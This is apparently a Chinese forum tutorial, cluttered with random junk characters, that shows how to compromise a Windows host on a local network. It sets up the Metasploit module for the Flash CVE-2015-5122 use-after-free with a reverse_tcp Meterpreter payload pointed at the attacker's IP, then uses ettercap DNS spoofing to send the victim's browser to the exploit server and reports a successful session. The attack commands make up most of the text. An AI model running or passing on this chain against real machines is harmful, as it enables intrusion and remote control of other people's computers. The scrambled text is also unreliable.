|
" t. q9 V. t/ t* U( \; q! B) x. g 二、cve2015-5122漏洞实例演示虚拟机
8 |) }6 n7 k) y% s% c/ h j4 e3 z8 ]2 { / D3 P0 h9 `: \ e; V- S
% I% I; E9 B3 V* _' ^
关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015年flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图: - Q* m+ k# B( p" t
/ @- M0 M! k! C Z$ P4 `2 p: f! K
H- E3 j5 `& {6 [; j search cve-2015-5122如图: , e& [5 l# I4 k- ]
4 F3 d/ o6 G7 F) D% Y# I6 D3 b" B- X2 g/ b; x
( J+ H" P3 c; g( H
! ?- K6 F2 Y: ], F8 P' y( c1 a; B8 g+ _% c* F0 q" J- v3 Y
下面我们敲如下命令:
/ z2 b" t; T" H, C! O
; w8 f- V: w5 Y$ p
6 N+ `5 K( e1 P+ ] use exploit/multi/browser/adobe_flash_opaque_background_uaf
4 ~: q$ m- a& |& U2 w4 \: ~1 s; M 3 Z/ P9 G( M6 a u, v% V
8 v, ~# v* v' J2 \' F% {4 ~8 g set PAYLOAD windows/meterpreter/reverse_tcp
) x& u- Q5 H2 Q- L9 t4 G
& Q3 i4 G* m9 g$ b6 [. Q% d2 D( O& J8 t) k- s* z3 r
set LHOST 192.168.0.109 1 P i, X& n7 q. j
0 x* v0 \! L9 k$ T- g- g+ d1 F
) C$ [/ x: w* v0 e4 p set URIPATH / /*根目录*/
N1 W5 X0 \& j/ C# x! i5 z 2 f) L" ]& x) Q6 {' @2 B( N
, E, M- j6 k" l7 |
set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址
% f; B5 q. Q7 Q& x# I ; K% j- l2 @" U8 S" h) Z- V
% I7 O( q- g, J7 ^
set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 3 G6 N0 b/ d; C# n8 P
* D9 P( ?1 _1 o- Y5 y) X2 \3 k- m/ [9 Y
然后show options如图:
9 }' ^- N2 n4 Z ?2 _1 [4 E/ o
0 C" O X. ^( v. {5 g+ J N7 l
- A g6 A4 B4 U& J
$ d4 x, D) F3 b3 f2 l1 w4 s
0 @, c; T( O" T: e
6 B C" d1 n, c( [7 v$ {% p6 }' y* {% W 一切都设置好了,执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图:
/ g% A6 [3 S4 c5 T - V9 |/ a+ [3 M2 b; { K" Y# k
' A! X* Z' c5 a9 _: |& m1 C M7 H
3 y# h1 d W; j; y$ K 然后ettercap -G命令打开ettercap,我们要攻击的主机ip是192.168.0。115 0 K3 P6 j% w5 G# i8 E: |5 ~
6 G4 M* T7 U5 ^
! A, B9 k% x |- F! k1 M/ S; i Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf
$ w$ t; ?1 \$ H l6 K" A
& X- E$ M) {, q# j4 D
& }7 E6 e. r* ]6 m# _$ ^8 r) p ( _# T' z- J9 k- i) r0 J
" j& F/ V9 R) s# J
9 U& a; ^8 R& T. p/ ?0 E
成功了,这时候我们断开ettercap,如图:
" e& P& R' ?$ Z; i' q2 R " y- B Y* M# \
a4 P3 ? O0 B" b3 x+ J4 P
- k5 k1 s/ y9 m$ E" N1 }' l! j
0 i+ D5 F3 E4 _( x& F) R# I5 n, b' ]
Screenshot如图: : Q3 E2 W& R. X- I8 {
9 S Z: M: T' L, r1 A+ i' |
2 s- X- i4 ?1 E/ P. | * Y, d, V/ O% ^- V
; I8 j7 f8 F0 G3 e( r9 `4 K1 M, j
* K3 y2 I0 F; l& R+ j* Z ! w5 C( r s& z7 ^4 h7 A
|